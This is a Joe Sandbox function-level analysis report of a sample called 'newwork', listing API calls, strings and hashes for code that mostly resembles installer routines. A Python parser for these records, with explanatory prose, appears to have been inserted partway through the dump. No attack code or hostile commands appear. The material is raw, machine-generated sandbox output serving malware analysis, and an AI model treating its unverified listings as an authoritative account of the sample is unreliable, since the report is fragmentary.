                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                        • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                        • API String ID: 59345061-4263478283
                                                                                        • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                        • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                        • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                        • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                        APIs
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                        • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                        • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                        • GetDC.USER32(00000000), ref: 0041B402
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                        • String ID:
                                                                                        • API String ID: 644427674-0
                                                                                        • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                        • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                        • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                        • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                        • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                        • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                        • API String ID: 971782779-3668018701
                                                                                        • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                        • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                        • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                        • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                        • RegOpenKeyEx, xrefs: 00454910
                                                                                        • , xrefs: 004548FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$FormatMessageOpen
                                                                                        • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                        • API String ID: 2812809588-1577016196
                                                                                        • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                        • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                        • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                        • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                        APIs
                                                                                          • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                        Strings
                                                                                        • v4.0.30319, xrefs: 004594F1
                                                                                        • .NET Framework version %s not found, xrefs: 00459609
                                                                                        • .NET Framework not found, xrefs: 0045961D
                                                                                        • v2.0.50727, xrefs: 0045955B
                                                                                        • v1.1.4322, xrefs: 004595C2
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Open
                                                                                        • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                        • API String ID: 2976201327-446240816
                                                                                        • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                        • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                        • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                        • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
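The function records above all share one layout (an "APIs" list with optional "Part of subcall function" entries, a "Strings" list with xrefs, a "Memory Dump Source" block and a "Similarity" block). The following parser is an added example, not code from this report or from Joe Sandbox: it turns a record into a structured dict so that, for instance, the names a function resolves through GetProcAddress (which will not appear in the PE import table) or the registry paths it opens can be pulled out across many records. The two sample records are copied from this page (the function at 0045CBDA that resolves advapi32 ACL APIs at run time, and the one at 004595D0 that probes .NET Framework policy keys); the dict keys and helper names are my own choice, and the argument-position assumptions (GetProcAddress's second argument is the symbol name, RegOpenKeyEx's second argument is lpSubKey) are stated in the comments.

```python
"""Parser for the per-function records in a Joe Sandbox function listing.
Added illustration, not code from the report or from Joe Sandbox itself;
SAMPLE_RECORDS is copied from two records on this page."""
import re
from typing import Dict, List, Optional

BULLET = "• "
# "<Api>.<MODULE>(<args>), ref: <addr>"  or  "<Api>.<MODULE> ref: <addr>"
API_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-F]{8}): (?P<rest>.*)$")

# Two records copied from this page (raw strings: the values contain backslashes).
SAMPLE_RECORDS = [r"""APIs
• GetVersion.KERNEL32 ref: 0045CBDA
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
  • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
• AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
• GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
""", r"""APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
Strings
• .NET Framework version %s not found, xrefs: 00459609
• SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
Similarity
• API ID: Close$Open
• String ID:
"""]


def parse_api_line(body: str) -> Dict:
    """One API bullet -> dict; 'subcall_of' holds the callee address for
    'Part of subcall function' entries, None for direct calls."""
    subcall: Optional[str] = None
    m = SUBCALL_RE.match(body)
    if m:
        subcall, body = m.group("fn"), m.group("rest")
    m = API_RE.match(body)
    if not m:
        raise ValueError(f"unrecognised API line: {body!r}")
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": m.group("ref"), "subcall_of": subcall}


def parse_record(text: str) -> Dict:
    """Split one record into its sections; bare lines are section headers."""
    rec: Dict = {"apis": [], "strings": [], "source": {}, "similarity": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith(BULLET):
            section = line
            continue
        body = line[len(BULLET):]
        if section == "APIs":
            rec["apis"].append(parse_api_line(body))
        elif section == "Strings":
            value, sep, xref = body.rpartition(", xrefs: ")
            if not sep:                      # string without an xref
                value, xref = body, None
            rec["strings"].append({"value": value, "xref": xref})
        elif section == "Memory Dump Source":
            for part in body.split(", "):    # "Source File: x, Offset: y, ..."
                key, _, val = part.partition(": ")
                rec["source"].setdefault(key, []).append(val)
        elif section == "Similarity":
            key, _, val = body.partition(":")
            key, val = key.strip(), val.strip()
            if key in ("API ID", "String ID"):   # '$'-separated lists
                rec["similarity"][key] = val.split("$") if val else []
            else:
                rec["similarity"][key] = val
    return rec


def dynamic_imports(rec: Dict) -> List[str]:
    """Symbol names resolved through GetProcAddress (assumed: 2nd argument),
    i.e. APIs that will not show up in the PE import table."""
    return [c["args"][1] for c in rec["apis"]
            if c["api"] == "GetProcAddress" and len(c["args"]) > 1]


def calls_by_module(rec: Dict, include_subcalls: bool = False) -> Dict[str, List[str]]:
    """Sorted, de-duplicated API names per module; subcalls opt-in."""
    out: Dict[str, set] = {}
    for c in rec["apis"]:
        if c["subcall_of"] and not include_subcalls:
            continue
        out.setdefault(c["module"], set()).add(c["api"])
    return {mod: sorted(names) for mod, names in out.items()}


def registry_paths(rec: Dict) -> List[str]:
    """Registry key paths: backslash strings plus RegOpenKeyEx lpSubKey
    (assumed: 2nd argument of RegOpenKeyEx/RegOpenKeyExA)."""
    paths = [s["value"] for s in rec["strings"] if "\\" in s["value"]]
    for c in rec["apis"]:
        if c["api"].startswith("RegOpenKeyEx") and len(c["args"]) > 1:
            paths.append(c["args"][1])
    return paths


if __name__ == "__main__":
    for text in SAMPLE_RECORDS:
        rec = parse_record(text)
        print(calls_by_module(rec), dynamic_imports(rec), registry_paths(rec))
```

Running the parser over every record of a report, rather than the two copied here, gives a per-function view of which imports are resolved at run time and which registry keys each function touches, which is quicker to triage than reading the records one by one.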
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                        • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                        • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                        • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                        • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                        Strings
                                                                                        • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                        • Helper process exited., xrefs: 00458AC5
                                                                                        • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                        • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                        • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                        • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                        • API String ID: 3355656108-1243109208
                                                                                        • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                        • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                        • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                        • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                        APIs
                                                                                          • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                        • , xrefs: 004545B1
                                                                                        • RegCreateKeyEx, xrefs: 004545C3
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFormatMessageQueryValue
                                                                                        • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                        • API String ID: 2481121983-1280779767
                                                                                        APIs
                                                                                          • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                          • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                        • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                          • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                        • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                        • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                        • API String ID: 1549857992-2312673372
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                        • API String ID: 4190037839-2312295185
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 004629FC
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                        • API String ID: 2610873146-3407710046
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 0042F194
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
